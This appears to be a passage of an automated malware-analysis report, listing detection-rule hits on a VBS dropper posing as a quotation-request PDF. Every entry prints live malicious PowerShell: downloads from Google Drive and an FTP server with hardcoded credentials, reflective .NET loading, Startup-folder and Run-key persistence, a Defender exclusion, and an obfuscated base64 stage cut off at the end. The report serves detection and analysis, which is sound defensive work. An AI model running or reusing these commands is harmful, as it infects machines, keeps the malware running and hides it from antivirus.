{$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$xglvh = (New-Object Net.WebClient);$xglvh.Encoding = [System.Text.Encoding]::UTF8;$xglvh.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$qkvzt.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $qkvzt.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$qkvzt.dispose();$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $qkvzt.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.revres/segami/or.cuicrelotsanomis//:sptth' , $huUPX , 'D D1D' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3200, ParentProcessName: powershell.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x2.ps1", ProcessId: 7176, ProcessName: powershell.exe
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7176, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_khx
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$xglvh = (New-Object Net.WebClient);$xglvh.Encoding = [System.Text.Encoding]::UTF8;$xglvh.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$qkvzt.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $qkvzt.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$qkvzt.dispose();$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $qkvzt.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.revres/segami/or.cuicrelotsanomis//:sptth' , $huUPX , 'D D1D' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$xglvh = (New-Object Net.WebClient);$xglvh.Encoding = [System.Text.Encoding]::UTF8;$xglvh.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidati
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit, CommandLine: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit, ProcessId: 7860, ProcessName: cmd.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$xglvh = (New-Object Net.WebClient);$xglvh.Encoding = [System.Text.Encoding]::UTF8;$xglvh.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$qkvzt.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $qkvzt.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$qkvzt.dispose();$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $qkvzt.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.revres/segami/or.cuicrelotsanomis//:sptth' , $huUPX , 'D D1D' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$xglvh = (New-Object Net.WebClient);$xglvh.Encoding = [System.Text.Encoding]::UTF8;$xglvh.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidati
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$xglvh = (New-Object Net.WebClient);$xglvh.Encoding = [System.Text.Encoding]::UTF8;$xglvh.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$qkvzt.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $qkvzt.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$qkvzt.dispose();$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $qkvzt.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.revres/segami/or.cuicrelotsanomis//:sptth' , $huUPX , 'D D1D' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3200, ParentProcessName: powershell.exe, ProcessCommandLine: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;, ProcessId: 1644, ProcessName: powershell.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$xglvh = (New-Object Net.WebClient);$xglvh.Encoding = [System.Text.Encoding]::UTF8;$xglvh.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$qkvzt.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $qkvzt.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$qkvzt.dispose();$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $qkvzt.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.revres/segami/or.cuicrelotsanomis//:sptth' , $huUPX , 'D D1D' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$xglvh = (New-Object Net.WebClient);$xglvh.Encoding = [System.Text.Encoding]::UTF8;$xglvh.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidati
                    Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7176, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_khx
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$xglvh = (New-Object Net.WebClient);$xglvh.Encoding = [System.Text.Encoding]::UTF8;$xglvh.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$qkvzt.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $qkvzt.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$qkvzt.dispose();$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $qkvzt.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.revres/segami/or.cuicrelotsanomis//:sptth' , $huUPX , 'D D1D' ) );};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$xglvh = (New-Object Net.WebClient);$xglvh.Encoding = [System.Text.Encoding]::UTF8;$xglvh.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidati
                    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs", ProcessId: 5720, ProcessName: wscript.exe
                    Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\", CommandLine: cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$xglvh = (New-Object Net.WebClient);$xglvh.Encoding = [System.Text.Encoding]::UTF8;$xglvh.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$qkvzt.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $qkvzt.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$qkvzt.dispose();$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $qkvzt.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.revres/segami/or.cuicrelotsanomis//:sptth' , $huUPX , 'D D1D' ) );};", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3200, ParentProcessName: powershell.exe, ProcessCommandLine: cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\", ProcessId: 5560, ProcessName: cmd.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHMAaQ' + [char]66 + 'tAG8Abg' + [char]66 + 'hAHMAdA' + [char]66 + 'vAGwAZQ' + [char]66 + 'yAGMAaQ' + [char]66 + '1AGMALg' + [char]66 + 'yAG8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAHMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAC4AdA' + [char]66 + '4AHQAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJw' + [char]66 + 'JAFYARg' + [char]66 + 'yAHAAJwAgACgAZA' + [char]66 + 'vAGgAdA' + [char]66 + 'lAE0AdA' + [char]66 + 'lAEcALgApACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAKA' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HAC4AKQAgAFoAYw' + [char]66 + 'CAGMAYQAkACAAKA' + [char]66 + 'kAGEAbw' + [char]66 + 'MAC4Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAdA' + [char]66 + 'uAGUAcg' + [char]66 + 'yAHUAQwA6ADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwApACAAKQAgACcAQQAnACAALAAgACcAkyE6AJMhJwAgACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAUgAuAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TADQANg' + [char]66 + 'lAHMAYQ' + [char]66 + 'CAG0Abw' + [char]66 + 'yAEYAOgA6AF0AdA' + [char]66 + 'yAGUAdg' + [char]66 + 'uAG8AQwAuAG0AZQ' + [char]66 + 